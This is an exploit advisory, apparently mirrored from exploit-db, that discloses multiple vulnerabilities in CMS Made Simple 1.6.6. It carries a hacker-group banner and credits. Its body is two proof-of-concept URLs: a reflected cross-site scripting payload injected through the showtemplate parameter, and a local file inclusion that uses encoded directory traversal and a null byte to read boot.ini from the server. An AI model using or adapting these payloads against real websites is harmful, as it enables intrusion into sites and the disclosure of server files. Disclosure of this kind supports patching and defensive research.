CMS Made Simple 1.6.6 – Multiple Vulnerabilities - 体验盒子

作者： Beenu Arora

日期： 2010-02-12

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11424/

################################################################ 
# .___ _________ .___# 
# __| _/____ _______|| __ ____ \ _\__| _/____# 
#/ __ |\__\\___ \|/ // ___\//_\\/ __ |/ __ \ # 
# / /_/ | / __ \|| \/<\\___\\_/ \/ /_/ \___/ # 
# \____ |(______/__||__|_ \\_____>\_____/\_____|\____\ # 
#\/\/ \/ # 
# ___________ _________# 
# _/ ___\___ \_/ __ \ \/ \/ /# 
# \\___|| \/\___/\ / # 
#\___>__|\___>\/\_/# 
#est.2007\/\/ forum.darkc0de.com # 
################################################################ 
# Greetz to all Darkc0de ,AI,ICW, AH Memebers
# Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,
#
# Author: Beenu Arora
# 
# Home: www.BeenuArora.com
# 
# Email : beenudel1986@gmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Exploit: Multiple Vulnerablities in cmsmadesimple
# 
# AppSite: http://www.cmsmadesimple.com/
# 
# Tested Version : 1.6.6
# XSS
# 
# POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
# 
#
# 
# Multiple Local File Inclusion
#
# Sample URL: 
# POC:-http://server/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
#
#
################################################################